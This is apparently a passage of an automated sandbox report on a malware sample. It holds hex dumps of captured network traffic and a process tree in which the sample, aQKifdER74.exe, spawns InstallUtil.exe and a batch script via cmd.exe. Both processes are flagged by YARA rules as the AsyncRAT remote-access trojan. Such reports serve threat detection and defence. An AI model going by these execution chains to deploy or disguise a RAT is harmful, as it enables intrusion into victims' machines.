                                        2021-09-27 18:36:18 UTC201INData Raw: 09 4f 50 b8 d7 bb ed 1e 4f 50 97 a7 d7 e2 0e 4f ae 9f 84 80 40 50 bb e2 cf 87 02 65 50 92 b3 da de 14 4f ae a0 84 80 40 50 85 ae a1 c5 10 50 98 9e 89 85 07 8d 50 87 e0 ca 8e 10 4f ae a1 84 80 40 50 b9 a2 f9 b2 0b 50 9a d7 e5 98 0e 4f 50 01 63 50 b7 e1 a9 d5 02 4f ae a2 84 80 40 50 89 a5 97 c6 11 50 a8 c2 e2 86 01 8d 50 02 5e 50 84 9f e7 b3 0a 4f ae a3 84 80 40 50 9b a5 e2 f5 10 50 bf d8 f4 e7 1d 8d 46 50 84 fa a8 86 14 4f ae a4 84 80 40 50 9a b2 9b 98 0f 50 04 5e 50 a0 a6 b6 83 13 4f ae a5 84 80 40 50 81 cb 85 e5 11 50 a2 99 db fc 06 28 65 50 b9 e5 bb 8e 1e 4f ae a6 84 80 40 50 ac a9 db 95 03 65 50 02 63 50 a5 95 c9 9a 1f 4f ae a7 84 80 40 50 9a f0 85 ab 10 65 50 8e 99 ce 10 4f ae a8 84 80 40 50 b0 94 ef 83 03 65 46 50 bf cf 8b a8 04 4f ae a9 84 80 40 50
                                        Data Ascii: OPOPO@PePO@PPPO@PPOPcPO@PPP^PO@PPFPO@PP^PO@PP(ePO@PePcPO@PePO@PeFPO@P
                                        2021-09-27 18:36:18 UTC205INData Raw: 0e 54 91 d9 71 8e 6e 26 99 fc 43 91 ee 69 09 df fc 60 e8 b2 da 76 94 2d c1 34 e9 b2 ac 54 bc 79 98 ca 28 0a 56 0b 76 59 24 23 21 90 98 63 2b 15 f3 37 0b 69 dd d4 9f 9d 4d d0 35 ab 53 29 96 08 0d 23 30 05 e1 ff f4 35 7c a8 b0 42 a1 00 15 5b ca 04 f2 9e 38 86 f1 31 7d d0 33 77 e0 18 5a a3 45 30 d6 0e 84 18 fa ec 4e dd 55 65 c8 88 21 20 97 a9 94 8e b9 eb 1b 4a 30 58 b7 8d f1 2a ca 28 6e db f9 49 6e 1b 51 d3 3b a5 f5 96 07 18 fe f0 65 31 74 3f a2 97 9b 7a 27 00 8b 1d 17 df a8 e5 9c 06 cc 80 19 03 d2 c1 5d 25 41 26 bf 42 3a bd ee 1f eb 24 81 46 a8 ce a4 83 00 f5 a0 27 1a f9 d9 a4 cd 10 e6 5c f5 ff dd ad 56 a3 ef 28 83 69 b7 97 9c 8b 52 b1 7e cb 3b 65 25 21 9f 96 b0 e6 01 ac 7b f5 0b 57 2d 86 34 7e b3 ee 85 60 42 8b f3 0a b6 c7 e4 9a 58 91 c5 bd 65 0d 73 71 87
                                        Data Ascii: Tqn&Ci`v-4Ty(VvY$#!c+7iM5S)#05|B[81}3wZE0NUe! J0X*(nInQ;e1t?z']%A&B:$F'\V(iR~;e%!{W-4~`BXesq
                                        2021-09-27 18:36:18 UTC210INData Raw: 67 1c 49 00 65 b5 3a 37 1a 00 f4 b7 de 20 b4 f7 a9 90 a1 58 35 e6 d5 2b 3f 40 14 8a bd 9c 4b 14 26 cc 7c 2a 46 f2 18 c0 10 11 48 88 c0 a0 6b 64 dd 05 61 51 31 ab 0d 83 2f be 10 1b 16 10 8e 7b 49 10 84 f0 c3 b6 01 47 f9 f0 56 6f 9e 01 1b ab a5 1e d4 95 3e 58 bc 8e 4d 58 ff 42 d0 c6 c5 c1 e1 60 64 45 c6 1e fb 23 2a ae 4e 1e 98 e0 38 58 cf f8 6b 83 1e 07 e6 3b f7 42 65 35 a9 c8 23 10 52 09 78 5d 6b b8 23 e1 67 08 94 27 9e b1 7b 4f 44 93 8e ad 96 6f 51 b4 70 e9 5f 23 87 75 93 4f 9e d6 51 5f 6b 46 81 5d 7d 27 9b b5 63 ce 29 69 70 32 7c ce ae 97 75 32 4a e9 97 2c 24 6f 1a 60 ff 61 a0 0f 36 2f 55 63 9f 27 31 5e 42 b0 27 4f 87 a1 e4 98 a5 77 ce 80 f2 4e 7b 19 ca 2a f6 5f b1 50 0b fa 5b 9e 95 89 3e e2 9e c7 a8 d9 37 87 52 0f bf b7 02 1e 1d 98 3a 1d 7d 6a ef e7 de
                                        Data Ascii: gIe:7 X5+?@K&|*FHkdaQ1/{IGVo>XMXB`dE#*N8Xk;Be5#Rx]k#g'{ODoQp_#uOQ_kF]}'c)ip2|u2J,$o`a6/Uc'1^B'OwN{*_P[>7R:}j
                                        2021-09-27 18:36:18 UTC214INData Raw: dd f0 49 aa 43 ab 1b d9 3f a1 5e 3e 4a f6 d7 a5 3e 8d e7 49 31 7e 6a 78 ac 12 d8 f0 8f 3a 2e ee 94 14 a0 76 2f e0 ec fa 16 06 37 9b 51 cb cf 79 d4 4d 53 0f 59 7f 3b 1c fa 5b 8e 8a 21 c2 0f 7c 2d 9f 57 2f 31 5a 0d ad 6a c8 d9 02 f8 4d 82 60 e5 90 d4 56 82 da e1 58 15 7b cf 34 f7 c0 96 d0 c9 a1 d2 24 6b 54 83 be 12 3b 45 f3 bc 9b d1 4f 52 9e 34 48 ed 1a 4b f2 b3 21 a1 fb c3 ab 6c 8d 15 94 a6 be a7 64 b6 e4 8c 68 9b b3 1c ca 84 cb b7 e7 79 02 51 cd 15 4e a0 75 12 37 b3 7b 09 e6 2a c2 e5 9a f4 4b 21 17 44 1c 7e d0 1f 25 05 43 ad 8c 8e 1a 7a c3 ba 49 d9 b2 24 91 ae 0f 3d 85 9b d8 82 56 7a 75 a6 06 28 2e c1 29 eb 64 3f f7 93 cc 9e 24 a4 f8 c3 40 3a ca 4f d7 e8 3d 7b 25 0a 2b 4d da cd b4 98 d3 5b e0 9e 08 24 90 5a 16 50 de 69 30 aa 54 87 36 a7 61 92 0a de 50 24
                                        Data Ascii: IC?^>J>I1~jx:.v/7QyMSY;[!|-W/1ZjM`VX{4$kT;EOR4HK!ldhyQNu7{*K!D~%CzI$=Vzu(.)d?$@:O={%+M[$ZPi0T6aP$
                                        2021-09-27 18:36:18 UTC225INData Raw: 22 c9 df 7a 28 ff 6a 73 38 30 31 59 1d 5f cc f9 ec 5a b7 e3 e5 ca 76 dd db 7a 6a 4c 18 1e 8d 65 fa 75 3f 13 8f a0 23 e9 72 4b e6 60 20 29 6e 5b cf 00 8e 40 ab 36 bf 61 22 fc 80 69 9e 98 1b ed 57 0d 08 eb 95 25 93 f3 bc cd d7 55 5b c2 3c 7d b3 3c a0 a9 e0 23 82 b4 0f a5 8c 7e 24 dc fc 7b 1d c0 78 bd fa dc a4 af 96 f8 26 2b 74 01 f6 1a 78 11 01 83 9c 9b 38 03 74 d4 9c ba 66 80 6e ca d2 67 73 34 d7 16 c0 02 a6 46 8f 1b 90 d4 60 7e 14 34 85 1c 74 69 5b c5 de 04 7b 7f ed 97 b9 12 2f fd 7a 9a 8a 0f 49 16 98 f8 3f e5 64 e6 45 a5 a2 99 62 55 10 85 9b 74 39 ef ec 03 ea ba b8 03 6b ab 7f 14 5f 16 88 c8 c7 4b f2 04 dd b3 c3 4c 92 64 c3 b1 56 71 6c 63 c4 2b 64 17 28 10 af b7 5f 4c a0 9f 23 9a 9c eb 5a 92 75 b2 ed 9e 6b 84 b7 45 3f a1 fe 8f dc 01 55 5f 36 13 d8 6f e7
                                        Data Ascii: "z(js801Y_ZvzjLeu?#rK` )n[@6a"iW%U[<}<#~${x&+tx8tfngs4F`~4ti[{/zI?dEbUt9k_KLdVqlc+d(_L#ZukE?U_6o
                                        2021-09-27 18:36:18 UTC241INData Raw: ad 93 49 00 09 8e b3 68 00 cd e3 23 66 f5 03 80 99 11 b8 b4 6f 78 23 a8 2b d6 5f 86 c8 3f 52 a7 53 e8 d3 c9 d4 0e 29 19 f2 52 96 ef 8f 90 77 96 43 e7 85 0e b6 20 a2 c0 0f ab d2 e1 7a 6c a7 f4 87 49 40 68 65 f6 e4 d6 33 bd 00 38 da 5d 97 f0 29 2b ce 4f 5a 50 c6 d3 b7 6b a2 ec 7a 81 37 64 c7 c2 9e cd b6 7c 5e d3 85 7d 98 4c 17 87 dc fe 89 03 46 4c 0b 03 54 a4 57 42 36 27 dc 81 5a 74 0b 9a 73 a8 53 35 87 eb a8 0f e6 cd 70 c0 73 9f ce ce d7 cb 90 d2 ef 26 b0 4b 4b a7 7f 56 a3 8a 88 1c 5f 06 c8 ac f5 6c cb 7a f7 0f 5f b4 91 3f 46 ca 54 81 40 e8 a3 68 41 8c 51 55 37 aa bc 43 53 08 85 f0 a4 fb e5 b2 da d9 1c d1 20 30 b2 eb 1f 6a 4c 2f 55 51 e9 1d 89 a0 b0 b6 ce 7e 72 f8 7e 6e 6e 8c 10 6e 81 31 08 5d 86 23 b4 cc 52 4e 04 10 2e 50 02 68 2b a1 f1 6d b7 33 81 fd 9a
                                        Data Ascii: Ih#fox#+_?RS)RwC zlI@he38])+OZPkz7d|^}LFLTWB6'ZtsS5ps&KKV_lz_?FT@hAQU7CS 0jL/UQ~r~nnn1]#RN.Ph+m3
                                        2021-09-27 18:36:18 UTC257INData Raw: c8 7d fc a9 96 b5 58 6c 5e ee 9b 87 36 23 14 35 c3 dc 8a f1 f8 58 1b c0 59 17 07 8e 42 18 fd bd 70 3e bd 79 94 7e b0 e5 27 ca 11 bd f8 39 7b a8 06 1d eb 4b 26 22 f0 06 fa 79 40 83 e4 10 c5 a2 3a 22 f8 d5 01 b7 e4 20 71 d2 c9 18 24 b4 73 f8 9a a1 ef 14 2b 0b 9e 00 f4 7d c0 b1 0d c8 57 93 bf d0 b8 0a bd 93 ae b2 44 c7 98 0b ab c4 41 11 be 78 5f 3f 88 a3 d0 59 6c 56 2c b2 09 a8 99 1f fd 1e d3 62 8e d6 02 2a 6f 73 21 fe 4c 9b 65 a7 a7 db 12 19 e5 43 e8 cd 53 e8 ee 39 31 a3 5d a0 fc 32 c2 10 6e 8b b5 31 e5 b6 70 bb 5f 57 03 8e b5 b8 f0 d1 a3 8f 44 3d 69 00 da cc 95 4e 90 11 6e 5d 09 e3 1d 54 5c c1 1b 72 2f 4b 8e 35 8f 01 24 7a dc 1f a2 1c 9e 39 19 af 95 0e 7f d7 43 b7 05 1c 74 16 0e 31 f7 01 77 bf f3 81 4d c9 78 6b c4 a5 44 10 e4 9a 96 bf 22 d5 18 43 3d 4a e9
                                        Data Ascii: }Xl^6#5XYBp>y~'9{K&"y@:" q$s+}WDAx_?YlV,b*os!LeCS91]2n1p_WD=iNn]T\r/K5$z9Ct1wMxkD"C=J
                                        2021-09-27 18:36:18 UTC273INData Raw: ac f8 e4 60 31 7a c4 78 3d 45 3d 3b 05 3c dd bc e1 be ce be 71 f5 c6 90 17 6e 83 7f 7b f7 00 c4 3c a0 d0 0c ab 23 ef 40 7c 16 d5 09 61 1a a6 d8 7b 1c c2 d7 ca 19 9e c3 eb e9 ff 59 33 d6 e2 03 f6 6b b7 4f b3 83 bc 1b cb cd 35 5b 30 f6 6e 80 a2 b9 80 a4 8b 28 a8 40 3c 6b 1a 10 f5 cb dc d2 11 50 9c e8 2c 6e 30 56 31 98 a1 3d d8 45 5a 54 64 70 4a 60 77 3f f9 4d ca 13 e2 f2 65 07 87 9f 6d 63 fd ce 78 f1 86 d5 70 01 62 d7 f1 1c 54 ec 51 73 17 43 be 16 00 7e da ba 81 4b d4 37 ee 31 92 94 ad 7e 13 23 f6 e5 82 b5 af 0b 25 f3 f3 de 0e 51 50 13 f5 da 3c 3a e6 41 50 e0 74 62 a4 a0 fd be 98 5b 6c 2a a0 60 9a 77 57 d7 f6 a2 0d a2 4e 50 5b 3f de 89 1f 93 f8 ba 3f 89 66 9f 68 34 f1 98 6d 56 88 ff 0a 8a ff 7f e4 a7 d3 be 44 7b 1e 1a 6c c2 1b da df 2f f0 81 04 4d 40 d6 4e
                                        Data Ascii: `1zx=E=;<qn{<#@|a{Y3kO5[0n(@<kP,n0V1=EZTdpJ`w?MemcxpbTQsC~K71~#%QP<:APtb[l*`wWNP[??fh4mVD{l/M@N
                                        2021-09-27 18:36:18 UTC289INData Raw: c5 0a ed dd 7f 0e 08 eb 36 57 96 cc e9 b7 33 08 d6 68 24 53 86 f1 b0 40 62 98 86 75 be 8f b8 79 10 9d 26 a9 8f 0e 00 4a b0 07 4e 91 5d 14 0a 36 aa 6d 86 8b c4 67 7c 9c 39 fc 3b 31 25 24 76 97 de 55 1e 31 eb 33 5b e0 98 51 aa f3 82 a5 31 3d bd 38 82 53 03 b6 28 fd 30 bc 4a 2b 91 fe 9b e8 2e 4c 1a a2 59 fd 4c 10 f8 0a c7 be 1a f4 3a cd 34 e0 83 ad 6d b9 44 73 22 3b fb f8 20 9d 3e 1d 6b cb 4c 4c 33 22 b5 37 65 58 b1 e1 52 19 0d 39 24 4c 0d 74 6c 43 64 bd 0c c6 54 9c c1 a3 4f ff b8 a4 7f 3b 34 12 9a 2f 13 4e 1d 29 d0 9b e5 2b 04 e0 42 c7 cb bd 72 d2 15 38 79 5b 05 03 bc 98 4e d8 24 47 62 8d b0 02 2d 2d 2b a3 05 95 58 d6 6c 6d 2c 3a d5 76 6f 39 70 bc 5d 29 6c 4d 8d 05 c7 cc 37 e0 49 43 55 10 d3 f2 07 2b 3a 68 d9 da a9 1c 1d 47 c3 57 0a d8 f1 b2 88 34 89 11 a2
                                        Data Ascii: 6W3h$S@buy&JN]6mg|9;1%$vU13[Q1=8S(0J+.LYL:4mDs"; >kLL3"7eXR9$LtlCdTO;4/N)+Br8y[N$Gb--+Xlm,:vo9p])lM7ICU+:hGW4
                                        2021-09-27 18:36:18 UTC305INData Raw: 97 26 cf f4 ae bd d8 72 b0 22 b9 79 2b 7f a3 78 06 11 74 f8 5a ec ee 1d c8 19 7a ff a7 be 2b 2d 36 1e e4 59 b3 ca 15 aa 16 bb 21 ea a2 dc c2 9a ad 77 8f 2e 07 96 ca ac 21 07 0d be 38 f6 85 2b b5 b5 4a 11 f3 58 9e 85 dc ff 51 e8 00 9f cb 22 29 65 12 fc 11 c3 d8 17 8b 9e 0e f5 56 7c 33 b3 fe 6c 84 82 ba 61 41 c2 94 5a f6 79 c4 7b 4a b0 8e 93 1c 3c fb 77 eb a7 b8 57 fb 91 aa e3 95 8f 8d cb e8 22 ed db 40 50 e3 e1 0d f5 d0 71 12 8e 2c 12 da 6b 24 4f d0 fb b6 dc 4f 45 29 e9 0a d3 78 d4 11 cd 34 bc 70 23 d7 75 02 bc 34 6a 62 60 84 a9 93 dd 3f fb 65 af b7 e5 c5 24 b6 17 1f f2 97 5b 9d 8c fd e9 dd df 7c 92 b5 65 85 5c bb 07 61 cd 3d 39 00 ef b6 85 0a ea f2 49 53 9d 37 e2 d4 a5 65 fe 2b 74 5e 49 87 e5 61 fb 14 4c 9e 07 dd e5 b9 ea 76 8c fe 05 b4 39 49 62 0f 6a aa
                                        Data Ascii: &r"y+xtZz+-6Y!w.!8+JXQ")eV|3laAZy{J<wW"@Pq,k$OOE)x4p#u4jb`?e$[|e\a=9IS7e+t^IaLv9Ibj
                                        2021-09-27 18:36:18 UTC321INData Raw: 03 54 bb fb 86 c3 fa 5a 6d bb 71 64 7e c2 93 d4 c5 52 15 e6 a9 a2 ce 82 bb 31 32 e0 26 ad 66 49 b9 61 39 b2 f5 0c 70 85 82 34 fa 47 40 cb d4 76 0d 88 53 b4 e3 be c4 cd fb 8e db 55 84 32 39 50 ee b5 0a 8a b2 ec eb d3 6b 36 b4 d0 57 d2 3d d2 84 9a 47 0b e7 18 35 89 5e 4f 36 4b 70 87 a3 99 fd 40 02 2f d5 db 4b 8d e3 ba b5 b9 cb bd bd 50 bc 4c 47 11 d5 f4 f8 41 4b 99 b9 ae 07 d1 8c 79 5c 37 90 fe 4e 55 d9 f4 71 ee 14 76 96 48 a7 d5 a7 27 1b 06 fe d5 5b 88 0c 57 99 9c ba 48 27 ce de af 96 da 1b c5 6d 00 3a c3 6d d3 43 c4 95 17 fa 0d 23 63 72 e4 b0 1b 40 c7 69 61 79 94 ad bf 3b 97 2d 7d ca 15 d9 48 98 f6 a0 fb 69 27 6a 53 8b 6c df a0 6f 82 1f 82 d5 68 47 be e0 66 80 54 b4 34 ec 2f 31 74 9f 1a 17 a4 5b b4 02 6f 89 57 67 5a c1 ec 02 61 db 4d cf af b2 3a a0 52 a0
                                        Data Ascii: TZmqd~R12&fIa9p4G@vSU29Pk6W=G5^O6Kp@/KPLGAKy\7NUqvH'[WH'm:mC#cr@iay;-}Hi'jSlohGfT4/1t[oWgZaM:R
                                        2021-09-27 18:36:18 UTC337INData Raw: 8c be df 07 55 35 e2 c8 3c 39 5d 0e ea 75 05 22 d5 a7 aa 33 56 d3 f4 03 b0 07 77 59 bb d2 74 1b e8 82 8b 5a ed e5 38 3e ff 83 08 1a 89 b1 32 df df 72 49 be 24 e0 24 a1 98 4e 01 81 e7 57 73 d4 e1 20 35 09 90 67 93 0e 9b fb 06 45 b4 81 64 63 48 67 9d fb 64 d7 ff de ab 3c a6 60 c8 34 b2 fe ef be ed 8d 79 88 78 97 22 5a 81 f4 33 a9 e0 3b 0d 84 29 be 2c 71 7c 87 d9 59 eb 9f 2b c5 a1 bf b4 62 66 3a 4a d0 d5 8a 66 b9 05 b8 6e 89 25 02 b7 9f df 1a 58 45 59 d6 fb 98 24 1a f1 67 82 ec da dc 22 ce ba 22 d7 e5 6f 18 c2 4f 1e 4f 30 eb b4 7a b9 69 85 79 0c 3f 68 d5 29 81 05 82 e2 a3 04 77 c0 67 0f d2 83 66 0a ab ea 56 63 e8 3d d6 a1 6a fb 03 0a 82 1f fd e7 b3 b7 81 50 99 93 8f ac 77 12 e3 7c 04 9f 8a 2f 94 26 0e fe 73 d0 1e 74 fa 01 09 fd 72 1e f8 eb cb c7 8f ff 87 8c
                                        Data Ascii: U5<9]u"3VwYtZ8>2rI$$NWs 5gEdcHgd<`4yx"Z3;),q|Y+bf:Jfn%XEY$g""oOO0ziy?h)wgfVc=jPw|/&str
                                        2021-09-27 18:36:18 UTC353INData Raw: 94 2f 85 f8 a7 ce 40 34 64 f7 ae 51 63 0d b3 c8 91 9e cc ec de 65 1b 2e 6c 72 ea f5 76 82 0a ba cb be c1 83 38 91 2e 52 2d 40 e1 d5 53 57 c1 52 57 58 18 41 61 65 34 ed 6f 98 c7 05 f5 91 62 e1 cf c1 fc 89 f7 d1 30 b4 19 b1 5e 3f 82 bf 53 1b 0f 9b 87 cc d6 04 5f 7d e6 48 bf 9a 40 30 07 df cd 13 43 b0 01 63 f9 8b c3 df 5f 13 9e 63 62 24 21 00 83 d6 6a 80 1e 0a 1b 68 7a e2 31 db 75 52 8a 2d 22 81 af a3 70 43 cc 30 e7 e1 39 e8 38 c6 02 0c 5c 55 54 a6 4d 40 98 10 cb 6f 91 16 54 89 14 0b b8 25 86 be 8e c1 d2 70 cb 0f d5 b0 38 cf 96 15 d5 7c 93 e4 7b f6 d7 86 d4 53 6e f8 65 2b 12 2a f2 dc 46 fb ad 9c b1 9f 78 8d 0e 89 a0 6e 1e d9 fb 3e fc 16 d4 a9 9a 69 4f 47 c2 4a e8 79 45 64 7d 28 7f 16 83 8d 9e f4 4c 4a 2d 41 2d f3 cf 9d 2a 89 37 a3 d7 18 85 85 e1 ec b7 64 9c
                                        Data Ascii: /@4dQce.lrv8.R-@SWRWXAae4ob0^?S_}H@0Cc_cb$!jhz1uR-"pC098\UTM@oT%p8|{Sne+*Fxn>iOGJyEd}(LJ-A-*7d
                                        2021-09-27 18:36:18 UTC355INData Raw: bd 1d 39 64 ae 9e f0 28 f0 d8 28 50 2e 54 24 e8 06 8c ea 6e d3 7a 81 af c1 5d 7b 66 bc 48 23 dd 81 df 73 36 71 e4 5e 61 82 3c f2 e2 d8 61 d4 2c 53 51 2b 88 44 ab 82 7e d2 61 fe b4 1b ce 61 1e d7 7e 5c b5 da f1 c5 da 19 52 e1 0e c1 39 53 79 53 e6 b3 0d 00 5e bd 85 d5 e8 9d d7 ff 9f 2a 88 ac 20 fd b8 72 3e 44 e9 d7 18 0f 87 89 5c 3f a4 a8 cc 6f fa d8 1f a6 83 40 6c b3 03 d9 e5 21 89 95 c4 01 1c a4 ef 3f 47 0c 37 ba ab a8 e7 7a dc 6a 93 a4 53 d7 91 42 e0 79 3d b7 f1 42 71 28 86 ce cb 6a 44 a9 49 52 60 39 81 16 a9 43 89 98 6f 68 9a c5 5d ff 97 a0 a6 d7 44 30 0d 34 bd a6 83 17 cf 59 78 29 b8 d9 72 c5 b3 a4 b1 0b 88 da 32 7b 87 fa 70 cd fb f3 6a ad d4 46 64 65 2f d9 7b 63 1a b5 64 6e 4f 1d 12 c5 53 f8 24 88 c7 42 4b 21 b0 d2 38 90 7d 84 b0 68 30 86 a9 77 60 c6
                                        Data Ascii: 9d((P.T$nz]{fH#s6q^a<a,SQ+D~aa~\R9SyS^* r>D\?o@l!?G7zjSBy=Bq(jDIR`9Coh]D04Yx)r2{pjFde/{cdnOS$BK!8}h0w`
                                        2021-09-27 18:36:18 UTC371INData Raw: 4f f2 dd f6 42 14 31 3c e8 b6 8e 90 bb 9b f7 fe 58 35 a5 0b 17 1f b6 51 ea 71 38 06 4f 23 52 c8 28 1f de 17 5d 30 30 cb 76 a4 ef 41 1d 7a 98 b3 1f 67 cf c3 fb 9c 30 78 08 76 20 d7 13 25 3f a3 8d 89 cf aa 6f fc 52 3e 85 94 2e 35 b7 81 d6 0a e7 19 1e eb 3d 56 82 5a 7e 0f 38 dd 8c 3d cd 0a 98 7d e3 ac ee 19 c0 5a c0 be 8f f2 5b b4 5a 1c c1 bf 45 77 30 42 3f c0 09 b3 66 ce af 7b 2d a4 01 55 ee 15 f6 98 66 cc 95 f2 0a 39 c6 9e 3b f7 b7 ea 21 02 8b fd fd a4 81 ae c1 bb 14 32 82 ed ea d7 d0 6b e3 bd 14 9d 8f f6 3c 02 b3 df bd b2 cc da 16 45 45 11 46 ed ba 33 d0 d3 57 11 a3 96 9e 4e 05 29 c8 31 49 62 9a 61 91 68 a3 13 4e d5 24 36 f3 99 4f 6a 77 f3 3a 74 92 df c7 2c ac 8d 73 7e 34 c0 56 c6 6d 30 ac 6e b4 9e e6 45 26 5d 88 ab f8 ee a8 08 7d 08 c8 42 d9 65 ce a6 5e
                                        Data Ascii: OB1<X5Qq8O#R(]00vAzg0xv %?oR>.5=VZ~8=}Z[ZEw0B?f{-Uf9;!2k<EEF3WN)1IbahN$6Ojw:t,s~4Vm0nE&]}Be^
                                        2021-09-27 18:36:18 UTC387INData Raw: d0 37 51 5f 7a 0b 88 f9 ae bc 63 e0 51 ee 79 96 16 57 03 86 48 4a 4e f9 b6 16 e1 5d 2b 81 ba 4f 16 6a 3d 77 b8 f9 15 89 8f 4d 31 74 c1 d6 25 71 c7 81 2d 06 eb 79 a8 8f 5f bc 3f a1 20 28 80 5f 85 72 18 e3 44 5b 8e 28 c4 6c f3 a7 df 34 ba fa 87 a0 d1 f9 d5 8b 60 3b 5b aa f8 81 7d c6 a6 c5 77 f8 3b 0c e5 5f 1a 0a 9b 27 96 8f e8 17 03 27 f1 7c 37 c4 96 04 df 4c 1c e0 40 43 b8 5e aa 96 b4 bd 03 ea 97 6c bc 50 f1 d3 47 87 e9 56 f2 59 52 7e 59 55 36 a2 9b c3 44 b1 39 a3 03 c2 e6 e5 83 f7 c1 f4 59 b8 49 53 54 95 48 00 25 c0 34 20 71 4c d9 5c ea fb 0c 27 61 4e 65 76 3f 6a 16 79 2d 3e 7c 7e 60 a8 39 eb 32 af f8 00 13 ba 5a 5b 07 b4 a8 08 6f 6a c8 67 90 c7 32 17 c0 cf 3b 57 d7 70 e7 1c c3 dd b7 51 cb 90 75 a3 56 c9 b0 99 be d1 5b 12 ad 90 82 ff 79 a6 36 21 73 5b 3f
                                        Data Ascii: 7Q_zcQyWHJN]+Oj=wM1t%q-y_? (_rD[(l4`;[}w;_''|7L@C^lPGVYR~YU6D9YISTH%4 qL\'aNev?jy->|~`92Z[ojg2;WpQuV[y6!s[?
                                        2021-09-27 18:36:18 UTC403INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                        Data Ascii:


                                        Code Manipulations

                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        Analysis Process: aQKifdER74.exe PID: 1172 Parent PID: 3220

                                        General

                                        Start time:20:36:15
                                        Start date:27/09/2021
                                        Path:C:\Users\user\Desktop\aQKifdER74.exe
                                        Wow64 process (32bit):false
                                        Commandline:'C:\Users\user\Desktop\aQKifdER74.exe'
                                        Imagebase:0x930000
                                        File size:15872 bytes
                                        MD5 hash:0D1C0270678DBF229C04ED4EC7E1A493
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000002.702390271.0000000002C8E000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000002.702559639.0000000002DCB000.00000004.00000001.sdmp, Author: Joe Security
                                        Reputation:low

                                        Chronological Activities

                                        Analysis Process: conhost.exe PID: 6568 Parent PID: 1172

                                        General

                                        Start time:20:36:15
                                        Start date:27/09/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Chronological Activities

                                        Analysis Process: InstallUtil.exe PID: 6432 Parent PID: 1172

                                        General

                                        Start time:20:36:25
                                        Start date:27/09/2021
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                        Imagebase:0x870000
                                        File size:41064 bytes
                                        MD5 hash:EFEC8C379D165E3F33B536739AEE26A3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000005.00000002.883519975.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000005.00000002.884667600.0000000002E41000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.884796919.0000000002E7F000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.889162579.0000000006B30000.00000004.00020000.sdmp, Author: Joe Security
                                        Reputation:moderate

                                        Chronological Activities

                                        Analysis Process: cmd.exe PID: 3184 Parent PID: 6432

                                        General

                                        Start time:20:37:50
                                        Start date:27/09/2021
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\tmpC472.tmp.bat''
                                        Imagebase:0x11d0000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Chronological Activities

                                        Analysis Process: conhost.exe PID: 4128 Parent PID: 3184

                                        General

                                        Start time:20:37:50
                                        Start date:27/09/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Chronological Activities

                                        Analysis Process: timeout.exe PID: 6316 Parent PID: 3184

                                        General

                                        Start time:20:37:51
                                        Start date:27/09/2021
                                        Path:C:\Windows\SysWOW64\timeout.exe
                                        Wow64 process (32bit):true
                                        Commandline:timeout 3
                                        Imagebase:0xbc0000
                                        File size:26112 bytes
                                        MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Chronological Activities

                                        Disassembly

                                        Code Analysis

